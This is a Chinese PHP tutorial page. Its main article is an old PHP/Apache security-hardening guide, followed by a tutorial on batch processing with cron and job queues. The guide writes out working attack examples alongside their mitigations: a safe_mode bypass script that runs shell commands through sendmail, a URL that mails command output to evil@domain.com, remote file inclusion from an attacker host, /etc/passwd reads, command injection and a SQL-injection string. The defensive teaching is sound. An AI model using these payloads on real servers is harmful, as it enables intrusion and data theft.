木翼下载系统中说明的PHP安全...-PHP 中的批处理的实现-关于在php.ini中添加extension=php_mysqli.dll指令的说明

当前位置: 编程技术>php

本页文章导读:

▪木翼下载系统中说明的PHP安全配置方法一、Web服务器安全 PHP其实不过是Web服务器的一个模块功能，所以首先要保证Web服务器的安全。当然Web服务器要安全又必须是先保证系统安全，这样就扯远了，无穷无尽。PHP可以和各种Web服.........

▪PHP 中的批处理的实现如果 Web 应用程序中的一个特性需要超过 1 秒或 2 秒才能完成，那么应该怎么办？需要某种离线处理解决方案。学习几种对 PHP 应用程序中长时间运行的作业进行离线服务的方法。大.........

▪关于在php.ini中添加extension=php_mysqli.dll指令的说明在配置php5时要使用mysql作为数据库，很多人都认为只要在php.ini中添加extension=php_mysql.dll;指令即可，不清楚为什么很多文章都推荐还要添加extension=php_mysqli.dll;指令。只要查看官方最新php手册.........

[1]木翼下载系统中说明的PHP安全配置方法

来源: 互联网发布时间: 2013-11-30

一、Web服务器安全

PHP其实不过是Web服务器的一个模块功能，所以首先要保证Web服务器的安全。当然Web服务器要安全又必须是先保证系统安全，这样就扯远了，无穷无尽。PHP可以和各种Web服务器结合，这里也只讨论Apache。非常建议以chroot方式安装启动Apache，这样即使Apache和PHP及其脚本出现漏洞，受影响的也只有这个禁锢的系统，不会危害实际系统。但是使用chroot的Apache后，给应用也会带来一定的麻烦，比如连接mysql时必须用127.0.0.1地址使用tcp连接而不能用localhost实现socket连接，这在效率上会稍微差一点。还有mail函数发送邮件也是个问题，因为php.ini里的：

[mail function]
; For Win32 only.
SMTP = localhost
; For Win32 only.
sendmail_from = me@localhost.com

都是针对Win32平台，所以需要在chroot环境下调整好sendmail。

二、PHP本身问题

1、远程溢出

PHP-4.1.2以下的所有版本都存在文件上传远程缓冲区溢出漏洞，而且攻击程序已经广泛流传，成功率非常高.

2、远程拒绝服务

PHP-4.2.0和PHP-4.2.1存在PHP multipart/form-data POST请求处理远程漏洞，虽然不能获得本地用户权限，但是也能造成拒绝服务。

3、safe_mode绕过漏洞

还有PHP-4.2.2以下到PHP-4.0.5版本都存在PHP mail函数绕过safe_mode限制执行命令漏洞，4.0.5版本开始mail函数增加了第五个参数，由于设计者考虑不周可以突破safe_mode的限制执行命令。其中4.0.5版本突破非常简单，只需用分号隔开后面加shell命令就可以了，比如存在PHP脚本evil.php：

执行如下的URL：

http://foo.com/evil.php?bar=;/usr/bin/id　mail evil@domain.com

这将id执行的结果发送给evil@domain.com。

对于4.0.6至4.2.2的PHP突破safe_mode限制其实是利用了sendmail的-C参数，所以系统必须是使用sendmail。如下的代码能够突破safe_mode限制执行命令：

#注意，下面这两个必须是不存在的，
或者它们的属主和本脚本的属主是一样
$script="/tmp/script123";
$cf="/tmp/cf123";
$fd = fopen($cf, "w");
fwrite($fd, "OQ/tmp
Sparse=0
R$*" . chr(9) . "$#local $@ $1 $: $1
Mlocal, P=/bin/sh, A=sh $script");
fclose($fd);
$fd = fopen($script, "w");
fwrite($fd, "rm -f $script $cf; ");
fwrite($fd, $cmd);
fclose($fd);
mail("nobody", "", "", "", "-C$cf");
?>

还是使用以上有问题版本PHP的用户一定要及时升级到最新版本，这样才能消除基本的安全问题。

三、PHP本身的安全配置

PHP的配置非常灵活，可以通过php.ini, httpd.conf, .htaccess文件（该目录必须设置了AllowOverride All或Options）进行设置，还可以在脚本程序里使用ini_set()及其他的特定的函数进行设置。通过phpinfo()和get_cfg_var()函数可以得到配置选项的各个值。

如果配置选项是唯一PHP_INI_SYSTEM属性的，必须通过php.ini和httpd.conf来修改，它们修改的是PHP的Master值，但修改之后必须重启apache才能生效。其中php.ini设置的选项是对Web服务器所有脚本生效，httpd.conf里设置的选项是对该定义的目录下所有脚本生效。

如果还有其他的PHP_INI_USER, PHP_INI_PERDIR, PHP_INI_ALL属性的选项就可以使用.htaccess文件设置，也可以通过在脚本程序自身用ini_set()函数设定，它们修改的是Local值，改了以后马上生效。但是.htaccess只对当前目录的脚本程序生效，ini_set()函数只对该脚本程序设置ini_set()函数以后的代码生效。各个版本的选项属性可能不尽相同，可以用如下命令查找当前源代码的main.c文件得到所有的选项，以及它的属性：

# grep PHP_INI_ /PHP_SRC/main/main.c

在讨论PHP安全配置之前，应该好好了解PHP的safe_mode模式。

1、safe_mode

safe_mode是唯一PHP_INI_SYSTEM属性，必须通过php.ini或httpd.conf来设置。要启用safe_mode，只需修改php.ini：

safe_mode = On
或者修改httpd.conf，定义目录：

Options FollowSymLinks
php_admin_value safe_mode 1

重启apache后safe_mode就生效了。启动safe_mode，会对许多PHP函数进行限制，特别是和系统相关的文件打开、命令执行等函数。

所有操作文件的函数将只能操作与脚本UID相同的文件，比如test.php脚本的内容为：

几个文件的属性如下：
# ls -la
total 13
drwxr-xr-x 2 root root 104 Jul 20 01:25 .
drwxr-xr-x 16 root root 384 Jul 18 12:02 ..
-rw-r--r-- 1 root root 4110 Oct 26 2002 index.html
-rw-r--r-- 1 www-data www-data 41 Jul 19 19:14 test.php

在浏览器请求test.php会提示如下的错误信息：

Warning: SAFE MODE Restriction in effect. The script whose uid/gid is 33/33 is not allowed to access ./index.html owned by uid/gid 0/0 in /var/www/test.php on line 1

如果被操作文件所在目录的UID和脚本UID一致，那么该文件的UID即使和脚本不同也可以访问的，不知这是否是PHP的一个漏洞还是另有隐情。所以php脚本属主这个用户最好就只作这个用途，绝对禁止使用root做为php脚本的属主，这样就达不到safe_mode的效果了。

如果想将其放宽到GID比较，则打开 safe_mode_gid可以考虑只比较文件的GID，可以设置如下选项：

safe_mode_gid = On

设置了safe_mode以后，所有命令执行的函数将被限制只能执行php.ini里safe_mode_exec_dir指定目录里的程序，而且shell_exec、`ls -l`这种执行命令的方式会被禁止。如果确实需要调用其它程序，可以在php.ini做如下设置：

safe_mode_exec_dir = /usr/local/php/exec

然后拷贝程序到该目录，那么php脚本就可以用system等函数来执行该程序。而且该目录里的shell脚本还是可以调用其它目录里的系统命令。

safe_mode_include_dir string

当从此目录及其子目录（目录必须在 include_path 中或者用完整路径来包含）包含文件时越过 UID/GID 检查。

从 PHP 4.2.0 开始，本指令可以接受和 include_path 指令类似的风格用分号隔开的路径，而不只是一个目录。

指定的限制实际上是一个前缀，而非一个目录名。这也就是说“safe_mode_include_dir = /dir/incl”将允许访问“/dir/include”和“/dir/incls”，如果它们存在。如果您希望将访问控制在一个指定的目录，那么请在结尾加上一个斜线，例如：“safe_mode_include_dir = /dir/incl/”。

safe_mode_allowed_env_vars string

设置某些环境变量可能是潜在的安全缺口。本指令包含有一个逗号分隔的前缀列表。在安全模式下，用户只能改变那些名字具有在这里提供的前缀的环境变量。默认情况下，用户只能设置以 PHP_ 开头的环境变量（例如 PHP_FOO = BAR）。

注: 如果本指令为空，PHP 将使用户可以修改任何环境变量！

safe_mode_protected_env_vars string

本指令包含有一个逗号分隔的环境变量的列表，最终用户不能用 putenv() 来改变这些环境变量。甚至在 safe_mode_allowed_env_vars 中设置了允许修改时也不能改变这些变量。

虽然safe_mode不是万能的（低版本的PHP可以绕过），但还是强烈建议打开安全模式，在一定程度上能够避免一些未知的攻击。不过启用safe_mode会有很多限制，可能对应用带来影响，所以还需要调整代码和配置才能和谐。被安全模式限制或屏蔽的函数可以参考PHP手册。

讨论完safe_mode后，下面结合程序代码实际可能出现的问题讨论如何通过对PHP服务器端的配置来避免出现的漏洞。

2、变量滥用

PHP默认register_globals = On，对于GET, POST, Cookie, Environment, Session的变量可以直接注册成全局变量。它们的注册顺序是variables_order = "EGPCS"（可以通过php.ini修改），同名变量variables_order右边的覆盖左边，所以变量的滥用极易造成程序的混乱。而且脚本程序员往往没有对变量初始化的习惯，像如下的程序片断就极易受到攻击：

//test_1.php
if ($pass == "hello")
$auth = 1;

if ($auth == 1)
echo "some important information";
else
echo "nothing";
?>

攻击者只需用如下的请求就能绕过检查：

http://victim/test_1.php?auth=1

这虽然是一个很弱智的错误，但一些著名的程序也有犯过这种错误，比如phpnuke的远程文件拷贝漏洞：http://www.securityfocus.com/bid/3361

PHP-4.1.0发布的时候建议关闭register_globals，并提供了7个特殊的数组变量来使用各种变量。对于从GET、POST、COOKIE等来的变量并不会直接注册成变量，必需通过数组变量来存取。PHP-4.2.0发布的时候，php.ini默认配置就是register_globals = Off。这使得程序使用PHP自身初始化的默认值，一般为0，避免了攻击者控制判断变量。

解决方法：

配置文件php.ini设置register_globals = Off。

要求程序员对作为判断的变量在程序最开始初始化一个值。

3、文件打开

极易受攻击的代码片断：

//test_2.php
if (!($str = readfile("$filename"))) {
echo("Could not open file: $filename
\n");
exit;
}
else {
echo $str;
}
?>

由于攻击者可以指定任意的$filename，攻击者用如下的请求就可以看到/etc/passwd：

http://victim/test_2.php?filename=/etc/passwd

如下请求可以读php文件本身：

http://victim/test_2.php?filename=test_2.php

PHP中文件打开函数还有fopen(), file()等，如果对文件名变量检查不严就会造成服务器重要文件被访问读取。

解决方法：

如非特殊需要，把php的文件操作限制在web目录里面。以下是修改apache配置文件httpd.conf的一个例子：

php_admin_value open_basedir /usr/local/apache/htdocs

重启apache后，/usr/local/apache/htdocs目录下的PHP脚本就只能操作它自己目录下的文件了，否则PHP就会报错：

Warning: open_basedir restriction in effect.

File is in wrong directory in xxx on line xx.

使用safe_mode模式也能避免这种问题，前面已经讨论过了。

4、包含文件

极易受攻击的代码片断：

//test_3.php
if(file_exists($filename))
include("$filename");
?>

这种不负责任的代码会造成相当大的危害，攻击者用如下请求可以得到/etc/passwd文件：

http://victim/test_3.php?filename=/etc/passwd

如果对于Unix版的PHP（Win版的PHP不支持远程打开文件）攻击者可以在自己开了http或ftp服务的机器上建立一个包含shell命令的文件，如http://attack/attack.txt的内容是，那么如下的请求就可以在目标主机执行命令ls /etc：

http://victim/test_3.php?filename=http://attack/attack.txt

攻击者甚至可以通过包含apache的日志文件access.log和error.log来得到执行命令的代码，不过由于干扰信息太多，有时不易成功。

对于另外一种形式，如下代码片断：

//test_4.php
include("$lib/config.php");
?>

攻击者可以在自己的主机建立一个包含执行命令代码的config.php文件，然后用如下请求也可以在目标主机执行命令：

http://victim/test_4.php?lib=http://attack

PHP的包含函数有include(), include_once(), require(), require_once。如果对包含文件名变量检查不严就会对系统造成严重危险，可以远程执行命令。

解决方法：

要求程序员包含文件里的参数尽量不要使用变量，如果使用变量，就一定要严格检查要包含的文件名，绝对不能由用户任意指定。

如前面文件打开中限制PHP操作路径是一个必要的选项。另外，如非特殊需要，一定要关闭PHP的远程文件打开功能。修改php.ini文件：

allow_url_fopen = Off

重启apache。
5、文件上传

php的文件上传机制是把用户上传的文件保存在php.ini的upload_tmp_dir定义的临时目录（默认是系统的临时目录，如：/tmp）里的一个类似phpxXuoXG的随机临时文件，程序执行结束，该临时文件也被删除。PHP给上传的文件定义了四个变量：（如form变量名是file，而且register_globals打开）

$file #就是保存到服务器端的临时文件（如/tmp/phpxXuoXG ）
$file_size #上传文件的大小
$file_name #上传文件的原始名称
$file_type #上传文件的类型

推荐使用：

$HTTP_POST_FILES['file']['tmp_name']
$HTTP_POST_FILES['file']['size']
$HTTP_POST_FILES['file']['name']
$HTTP_POST_FILES['file']['type']

这是一个最简单的文件上传代码：

//test_5.php
if(isset($upload) && $file != "none") {
copy($file, "/usr/local/apache/htdocs/upload/".$file_name);
echo "文件".$file_name."上传成功！点击继续上传";
exit;
}
?>

content="text/html; charset=gb2312">

上传文件:

这样的上传代码存在读取任意文件和执行命令的重大问题。

下面的请求可以把/etc/passwd文档拷贝到web目录/usr/local/apache/htdocs/test（注意：这个目录必须nobody可写）下的attack.txt文件里：

http://victim/test_5.php?upload= ... ile_name=attack.txt

然后可以用如下请求读取口令文件：

http://victim/test/attack.txt

攻击者可以把php文件拷贝成其它扩展名，泄漏脚本源代码。

攻击者可以自定义form里file_name变量的值，上传覆盖任意有写权限的文件。

攻击者还可以上传PHP脚本执行主机的命令。

解决方法：

PHP-4.0.3以后提供了is_uploaded_file和move_uploaded_file函数，可以检查操作的文件是否是用户上传的文件，从而避免把系统文件拷贝到web目录。

使用$HTTP_POST_FILES数组来读取用户上传的文件变量。

严格检查上传变量。比如不允许是php脚本文件。

把PHP脚本操作限制在web目录可以避免程序员使用copy函数把系统文件拷贝到web目录。move_uploaded_file不受open_basedir的限制，所以不必修改php.ini里upload_tmp_dir的值。

把PHP脚本用phpencode进行加密，避免由于copy操作泄漏源码。

严格配置文件和目录的权限，只允许上传的目录能够让nobody用户可写。

对于上传目录去掉PHP解释功能，可以通过修改httpd.conf实现：

php_flag engine off
#如果是php3换成php3_engine off

重启apache，upload目录的php文件就不能被apache解释了，即使上传了php文件也没有问题，只能直接显示源码。

6、命令执行

下面的代码片断是从PHPNetToolpack摘出，详细的描述见：

http://www.securityfocus.com/bid/4303

//test_6.php
system("traceroute $a_query",$ret_strs);
?>

由于程序没有过滤$a_query变量，所以攻击者可以用分号来追加执行命令。

攻击者输入如下请求可以执行cat /etc/passwd命令：

http://victim/test_6.php?a_query=www.example.com;cat /etc/passwd

PHP的命令执行函数还有system(), passthru(), popen()和``等。命令执行函数非常危险，慎用。如果要使用一定要严格检查用户输入。

解决方法：

要求程序员使用escapeshellcmd()函数过滤用户输入的shell命令。

启用safe_mode可以杜绝很多执行命令的问题，不过要注意PHP的版本一定要是最新的，小于PHP-4.2.2的都可能绕过safe_mode的限制去执行命令。

7、sql_inject

如下的SQL语句如果未对变量进行处理就会存在问题：

select * from login where user='$user' and pass='$pass'

攻击者可以用户名和口令都输入1' or 1='1绕过验证。

不过幸亏PHP有一个默认的选项magic_quotes_gpc = On，该选项使得从GET, POST, COOKIE来的变量自动加了addslashes()操作。上面SQL语句变成了：

select * from login where user='1\' or
1=\'1' and pass='1\' or 1=\'1'

从而避免了此类sql_inject攻击。

对于数字类型的字段，很多程序员会这样写：

select * from test where id=$id

由于变量没有用单引号扩起来，就会造成sql_inject攻击。幸亏MySQL功能简单，没有sqlserver等数据库有执行命令的SQL语句，而且PHP的mysql_query()函数也只允许执行一条SQL语句，所以用分号隔开多条SQL语句的攻击也不能奏效。但是攻击者起码还可以让查询语句出错，泄漏系统的一些信息，或者一些意想不到的情况。

解决方法：

要求程序员对所有用户提交的要放到SQL语句的变量进行过滤。

即使是数字类型的字段，变量也要用单引号扩起来，MySQL自己会把字串处理成数字。

在MySQL里不要给PHP程序高级别权限的用户，只允许对自己的库进行操作，这也避免了程序出现问题被 SELECT INTO OUTFILE ... 这种攻击。

8、警告及错误信息

PHP默认显示所有的警告及错误信息：

error_reporting = E_ALL & ~E_NOTICE
display_errors = On

在平时开发调试时这非常有用，可以根据警告信息马上找到程序错误所在。

正式应用时，警告及错误信息让用户不知所措，而且给攻击者泄漏了脚本所在的物理路径，为攻击者的进一步攻击提供了有利的信息。而且由于自己没有访问到错误的地方，反而不能及时修改程序的错误。所以把PHP的所有警告及错误信息记录到一个日志文件是非常明智的，即不给攻击者泄漏物理路径，又能让自己知道程序错误所在。

修改php.ini中关于Error handling and logging部分内容：

error_reporting = E_ALL
display_errors = Off
log_errors = On
error_log = /usr/local/apache/logs/php_error.log

然后重启apache，注意文件/usr/local/apache/logs/php_error.log必需可以让nobody用户可写。

9、disable_functions

如果觉得有些函数还有威胁，可以设置php.ini里的disable_functions（这个选项不能在httpd.conf里设置），比如：

disable_functions = phpinfo, get_cfg_var

可以指定多个函数，用逗号分开。重启apache后，phpinfo, get_cfg_var函数都被禁止了。建议关闭函数phpinfo, get_cfg_var，这两个函数容易泄漏服务器信息，而且没有实际用处。

10、disable_classes

这个选项是从PHP-4.3.2开始才有的，它可以禁用某些类，如果有多个用逗号分隔类名。disable_classes也不能在httpd.conf里设置，只能在php.ini配置文件里修改。

11、open_basedir

前面分析例程的时候也多次提到用open_basedir对脚本操作路径进行限制，这里再介绍一下它的特性。用open_basedir指定的限制实际上是前缀，不是目录名。也就是说 "open_basedir = /dir/incl" 也会允许访问 "/dir/include" 和 "/dir/incls"，如果它们存在的话。如果要将访问限制在仅为指定的目录，用斜线结束路径名。例如："open_basedir = /dir/incl/"。

可以设置多个目录，在Windows中，用分号分隔目录。在任何其它系统中用冒号分隔目录。作为Apache模块时，父目录中的open_basedir路径自动被继承。

四、其它安全配置

1、取消其它用户对常用、重要系统命令的读写执行权限

一般管理员维护只需一个普通用户和管理用户，除了这两个用户，给其它用户能够执行和访问的东西应该越少越好，所以取消其它用户对常用、重要系统命令的读写执行权限能在程序或者服务出现漏洞的时候给攻击者带来很大的迷惑。记住一定要连读的权限也去掉，否则在linux下可以用/lib/ld-linux.so.2 /bin/ls这种方式来执行。

如果要取消某程如果是在chroot环境里，这个工作比较容易实现，否则，这项工作还是有些挑战的。因为取消一些程序的执行权限会导致一些服务运行不正常。PHP的mail函数需要/bin/sh去调用sendmail发信，所以/bin/bash的执行权限不能去掉。这是一项比较累人的工作，

2、去掉apache日志其它用户的读权限

apache的access-log给一些出现本地包含漏洞的程序提供了方便之门。通过提交包含PHP代码的URL，可以使access-log包含PHP代码，那么把包含文件指向access-log就可以执行那些PHP代码，从而获得本地访问权限。

如果有其它虚拟主机，也应该相应去掉该日志文件其它用户的读权限。

当然，如果你按照前面介绍的配置PHP那么一般已经是无法读取日志文件了

[2]PHP 中的批处理的实现

来源: 互联网发布时间: 2013-11-30

如果 Web 应用程序中的一个特性需要超过 1 秒或 2 秒才能完成，那么应该怎么办？需要某种离线处理解决方案。学习几种对 PHP 应用程序中长时间运行的作业进行离线服务的方法。
大型的连锁店有一个大问题。每天，在每家商店会发生数千次交易。公司执行官希望对这些数据进行挖掘。哪些产品卖得好？哪些不好？有机产品在哪里卖得好？冰淇淋的销售情况怎么样？

为了捕捉这些数据，组织必须将所有事务性数据装载进一个数据模型，以便更适合生成公司所需的报告类型。但是，这很花费时间，而且随着连锁规模的增长，处理一天的数据可能要花费一天以上的时间。因此，这是个大问题。

现在，您的 Web 应用程序可能不需要处理这么多数据，但是任何站点的处理时间都有可能超过客户愿意等待的时间。一般来说，客户愿意等待的时间是 200 毫秒，如果超过这个时间，客户就会觉得过程 “缓慢”。这个数字基于桌面应用程序，而 Web 使我们更有耐心了。但无论如何，不应该让客户等待的时间超过几秒。所以，要采用一些策略来处理 PHP 中的批处理作业。

分散的方式与 cron

在 UNIX® 机器上，执行批处理的核心程序是 cron 守护进程。这个守护进程读取一个配置文件，这个文件会告诉它要运行哪些命令行以及运行的频率。然后，这个守护进程就按照配置执行它们。在遇到错误时，它甚至能够向指定的电子邮件地址发送错误输出，从而帮助对问题进行调试。

我知道一些工程师强烈主张使用线程技术。“线程！线程才是进行后台处理的真正方法。cron 守护进程太过时了。”

我不这么认为。

这两种方法我都用过，我认为 cron 具备 “Keep It Simple, Stupid（KISS，简单就是美）” 原则的优点。它使后台处理保持简单。不需要编写一直运行的多线程的作业处理应用程序（因此不会有内存泄漏），而是由 cron 启动一个简单的批处理脚本。这个脚本判断是否有作业要处理，执行作业，然后退出。不需要担心内存泄漏。也不需要担心线程停止或陷入无限循环。

那么，cron 是如何工作的？这依赖于您所处的系统环境。我只讨论老式简单的 cron 的 UNIX 命令行版本，您可以向系统管理员咨询如何在自己的 Web 应用程序中实现它。

下面是一个简单的 cron 配置，它在每天晚上 11 点运行一个 PHP 脚本：

0 23 * * * jack /usr/bin/php /users/home/jack/myscript.php

前 5 个字段定义应该启动脚本的时间。然后是应该用来运行这个脚本的用户名。其余的命令是要执行的命令行。时间字段分别是分、小时、月中的日、月和周中的日。下面是几个示例。

命令：

15 * * * * jack /usr/bin/php /users/home/jack/myscript.php

在每个小时的第 15 分钟运行脚本。

命令：

15,45 * * * * jack /usr/bin/php /users/home/jack/myscript.php

在每个小时的第 15 和第 45 分钟运行脚本。

命令：

*/1 3-23 * * * jack /usr/bin/php /users/home/jack/myscript.php

在早上 3 点到晚上 11 点之间的每分钟运行脚本。

命令

30 23 * * 6 jack /usr/bin/php /users/home/jack/myscript.php

在每星期六的晚上 11:30 运行脚本（星期六由 6 指定）。

可以看到，组合的数量是无限的。可以根据需要控制运行脚本的时间。还可以指定多个要运行的脚本，这样的话，一些脚本可以每分钟都运行，而其他脚本（比如备份脚本）可以每天只运行一次。

为了指定将报告的错误发送到哪个电子邮件地址，可以使用 MAILTO 指令，如下所示：

MAILTO=jherr@pobox.com

注意：对于 Microsoft® Windows® 用户，有一个等效的 Scheduled Tasks 系统可以用来定期启动命令行进程（比如 PHP 脚本）。

回页首

批处理体系结构的基础知识

批处理是相当简单的。在大多数情况下，采用两个工作流之一。第一个工作流用于进行报告；脚本每天运行一次，它生成报告并将报告发送给一组用户。第二个工作流是在响应某种请求时创建的批作业。例如，我登录进 Web 应用程序中，并要求它向系统中注册的所有用户发送一个消息，将一个新的特性告诉他们。这个操作必须进行批处理，因为系统中有 10,000 个用户。PHP 要花费一段时间才能完成这样的任务，所以它必须由浏览器之外的一个作业来执行。

在第二个工作流中，Web 应用程序只需将信息放在某个位置，让批处理应用程序共享它。这些信息指定作业的性质（例如，“Send this e-mail to all the people on the system”。）批处理程序运行这个作业，然后删除作业。另一种方法是，处理程序将作业标为已完成。无论用哪种方法，作业都应该识别为已完成，这样就不会再次运行它。

本文的其余部分演示在 Web 应用程序前端和批处理后端之间共享数据的各种方法。

回页首

邮件队列

第一种方法是使用专用的邮件队列系统。在这种模型中，数据库中的一个表包含应该发送给各个用户的电子邮件消息。Web 界面使用 mailouts 类将电子邮件添加到队列中。电子邮件处理程序使用 mailouts 类检索未处理的电子邮件，然后再次使用它从队列中删除未处理的电子邮件。

这个模型首先需要 MySQL 模式。

清单 1. mailout.sql
    DROP TABLE IF EXISTS mailouts;CREATE TABLE mailouts (  id MEDIUMINT NOT NULL AUTO_INCREMENT,  from_address TEXT NOT NULL,  to_address TEXT NOT NULL,  subject TEXT NOT NULL,  content TEXT NOT NULL,  PRIMARY KEY ( id ));

这个模式非常简单。每行中有一个 from 和一个 to 地址，以及电子邮件的主题和内容。

对数据库中的 mailouts 表进行处理的是 PHP mailouts 类。

清单 2. mailouts.php
    <?phprequire_once('DB.php');class Mailouts{  public static function get_db()  {    $dsn = 'mysql://root:@localhost/mailout';    $db =& DB::Connect( $dsn, array() );    if (PEAR::isError($db)) { die($db->getMessage()); }    return $db;  }  public static function delete( $id )  {    $db = Mailouts::get_db();    $sth = $db->prepare( 'DELETE FROM mailouts WHERE id=?' );    $db->execute( $sth, $id );    return true;  }  public static function add( $from, $to, $subject, $content )  {    $db = Mailouts::get_db();    $sth = $db->prepare( 'INSERT INTO mailouts VALUES (null,?,?,?,?)' );    $db->execute( $sth, array( $from, $to, $subject, $content ) );    return true;  }  public static function get_all()  {    $db = Mailouts::get_db();    $res = $db->query( "SELECT * FROM mailouts" );    $rows = array();    while( $res->fetchInto( $row ) ) { $rows []= $row; }    return $rows;  }}?>

这个脚本包含 Pear::DB 数据库访问类。然后定义 mailouts 类，其中包含三个主要的静态函数：add、delete 和 get_all。add() 方法向队列中添加一个电子邮件，这个方法由前端使用。get_all() 方法从表中返回所有数据。delete() 方法删除一个电子邮件。

您可能会问，我为什么不只在脚本末尾调用 delete_all() 方法。不这么做有两个原因：如果在发送每个消息之后删除它，那么即使脚本在出现问题之后重新运行，消息也不可能发送两次；在批作业的启动和完成之间可能会添加新的消息。

下一步是编写一个简单的测试脚本，这个脚本将一个条目添加到队列中。

清单 3. mailout_test_add.php
    <?phprequire 'mailout.php';Mailouts::add( 'donotreply@mydomain.com',  'molly@nocompany.com.org',  'Test Subject',  'This is a test of the batch mail sendout' );?>

在这个示例中，我添加一个 mailout，这个消息要发送给某公司的 Molly，其中包括主题 “Test Subject” 和电子邮件主体。可以在命令行上运行这个脚本：php mailout_test_add.php。

为了发送电子邮件，需要另一个脚本，这个脚本作为作业处理程序。

清单 4. mailout_send.php
    <?phprequire_once 'mailout.php';function process( $from, $to, $subject, $email ) {  mail( $to, $subject, $email, "From: $from" );}$messages = Mailouts::get_all();foreach( $messages as $msg ) {  process( $msg[1], $msg[2], $msg[3], $msg[4] );  Mailouts::delete( $msg[0] );}?>

这个脚本使用 get_all() 方法检索所有电子邮件消息，然后使用 PHP 的 mail() 方法逐一发送消息。在每次成功发送电子邮件之后，调用 delete() 方法从队列中删除对应的记录。

使用 cron 守护进程定期运行这个脚本。运行这个脚本的频率取决于您的应用程序的需要。

注意：PHP Extension and Application Repository（PEAR）存储库包含一个出色的邮件队列系统实现，可以免费下载。

回页首

更通用的方法

专门用来发送电子邮件的解决方案是很不错，但是是否有更通用的方法？我们需要能够发送电子邮件、生成报告或者执行其他耗费时间的处理，而不必在浏览器中等待处理完成。

为此，可以利用一个事实：PHP 是一种解释型语言。可以将 PHP 代码存储在数据库中的队列中，以后再执行它。这需要两个表，见清单 5。

清单 5. generic.sql
    DROP TABLE IF EXISTS processing_items;CREATE TABLE processing_items (  id MEDIUMINT NOT NULL AUTO_INCREMENT,  function TEXT NOT NULL,  PRIMARY KEY ( id ));DROP TABLE IF EXISTS processing_args;CREATE TABLE processing_args (  id MEDIUMINT NOT NULL AUTO_INCREMENT,  item_id MEDIUMINT NOT NULL,  key_name TEXT NOT NULL,  value TEXT NOT NULL,  PRIMARY KEY ( id ));

第一个表 processing_items 包含作业处理程序调用的函数。第二个表 processing_args 包含要发送给函数的参数，采用的形式是由键/值对组成的 hash 表。

与 mailouts 表一样，这两个表也由 PHP 类包装，这个类称为 ProcessingItems。

清单 6. generic.php
    <?phprequire_once('DB.php');class ProcessingItems{  public static function get_db() { ... }  public static function delete( $id )  {    $db = ProcessingItems::get_db();    $sth = $db->prepare( 'DELETE FROM processing_args WHERE item_id=?' );    $db->execute( $sth, $id );    $sth = $db->prepare( 'DELETE FROM processing_items WHERE id=?' );    $db->execute( $sth, $id );    return true;  }  public static function add( $function, $args )  {    $db = ProcessingItems::get_db();    $sth = $db->prepare( 'INSERT INTO processing_items VALUES (null,?)' );    $db->execute( $sth, array( $function ) );    $res = $db->query( "SELECT last_insert_id()" );    $id = null;    while( $res->fetchInto( $row ) ) { $id = $row[0]; }    foreach( $args as $key => $value )    {        $sth = $db->prepare( 'INSERT INTO processing_args  VALUES (null,?,?,?)' );        $db->execute( $sth, array( $id, $key, $value ) );    }    return true;  }  public static function get_all()  {    $db = ProcessingItems::get_db();    $res = $db->query( "SELECT * FROM processing_items" );    $rows = array();    while( $res->fetchInto( $row ) )    {        $item = array();        $item['id'] = $row[0];        $item['function'] = $row[1];        $item['args'] = array();        $ares = $db->query( "SELECT key_name, value FROM   processing_args WHERE item_id=?", $item['id'] );        while( $ares->fetchInto( $arow ) )            $item['args'][ $arow[0] ] = $arow[1];        $rows []= $item;    }    return $rows;  }}?>

这个类包含三个重要的方法：add()、get_all() 和 delete()。与 mailouts 系统一样，前端使用 add()，处理引擎使用 get_all() 和 delete()。

清单 7 所示的测试脚本将一个条目添加到处理队列中。

清单 7. generic_test_add.php
    <?phprequire_once 'generic.php';ProcessingItems::add( 'printvalue', array( 'value' => 'foo' ) );?>

在这个示例中，添加了一个对 printvalue 函数的调用，并将 value 参数设置为 foo。我使用 PHP 命令行解释器运行这个脚本，并将这个方法调用放进队列中。然后使用以下处理脚本运行这个方法。

清单 8. generic_process.php
    <?phprequire_once 'generic.php';function printvalue( $args ) {  echo 'Printing: '.$args['value']."\n";}foreach( ProcessingItems::get_all() as $item ) {  call_user_func_array( $item['function'],    array( $item['args'] ) );  ProcessingItems::delete( $item['id'] );}?>

这个脚本非常简单。它获得 get_all() 返回的处理条目，然后使用 call_user_func_array（一个 PHP 内部函数）用给定的参数动态地调用这个方法。在这个示例中，调用本地的 printvalue 函数。

为了演示这种功能，我们看看在命令行上发生了什么：

% php generic_test_add.php % php generic_process.php Printing: foo%

输出并不多，但是您能够看出要点。通过这种机制，可以将任何 PHP 函数的处理推迟。

现在，如果您不喜欢将 PHP 函数名和参数放进数据库中，那么另一种方法是在 PHP 代码中建立数据库中的 “处理作业类型” 名称和实际 PHP 处理函数之间的映射。按照这种方式，如果以后决定修改 PHP 后端，那么只要 “处理作业类型” 字符串匹配，系统就仍然可以工作。

回页首

放弃数据库

最后，我演示另一种稍有不同的解决方案，它使用一个目录中的文件来存储批作业，而不是使用数据库。在这里提供这个思路并不是建议您 “采用这种方式，而不使用数据库”，这只是一种可供选择的方式，是否采用它由您决定。

显然，这个解决方案中没有模式，因为我们不使用数据库。所以先编写一个类，它包含与前面示例中相似的 add()、get_all() 和 delete() 方法。

清单 9. batch_by_file.php
    <?phpdefine( 'BATCH_DIRECTORY', 'batch_items/' );class BatchFiles{  public static function delete( $id )  {    unlink( $id );    return true;  }  public static function add( $function, $args )  {    $path = '';    while( true )    {        $path = BATCH_DIRECTORY.time();        if ( file_exists( $path ) == false )            break;    }    $fh = fopen( $path, "w" );    fprintf( $fh, $function."\n" );    foreach( $args as $k => $v )    {        fprintf( $fh, $k.":".$v."\n" );    }    fclose( $fh );    return true;  }  public static function get_all()  {    $rows = array();    if (is_dir(BATCH_DIRECTORY)) {        if ($dh = opendir(BATCH_DIRECTORY)) {            while (($file = readdir($dh)) !== false) {                $path = BATCH_DIRECTORY.$file;                if ( is_dir( $path ) == false )                {                    $item = array();                    $item['id'] = $path;                    $fh = fopen( $path, 'r' );                    if ( $fh )                    {                        $item['function'] = trim(fgets( $fh ));                        $item['args'] = array();                        while( ( $line = fgets( $fh ) ) != null )                        {                            $args = split( ':', trim($line) );                            $item['args'][$args[0]] = $args[1];                        }                        $rows []= $item;                        fclose( $fh );                    }                }            }            closedir($dh);        }    }    return $rows;  }}?>

BatchFiles 类有三个主要方法：add()、get_all() 和 delete()。这个类不访问数据库，而是读写 batch_items 目录中的文件。

使用以下测试代码添加新的批处理条目。

清单 10. batch_by_file_test_add.php
    <?phprequire_once 'batch_by_file.php';BatchFiles::add( "printvalue", array( 'value' => 'foo' ) );?>

